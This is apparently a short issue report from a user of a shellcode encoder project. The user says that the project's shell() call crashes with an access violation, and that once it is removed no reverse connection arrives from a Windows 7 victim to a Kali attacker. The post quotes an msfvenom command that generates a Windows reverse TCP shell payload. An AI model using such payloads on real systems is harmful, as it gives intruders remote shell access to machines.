shell() / no connection

Testing your project really was looking for something like
so i got an error when i create a py file with an error:
shell()
WindowsError: exception: access violation writing 0x0000000002E9AE20

so i delete the shell() function in line 59 file: shellcode_encoder.py
and i get no error but i dont receive any connection :(
attacker - kali machine
victim - windows 7 machine
i used
msfvenom -p windows/shell_reverse_tcp lhost= lport= -f c

any ideas?
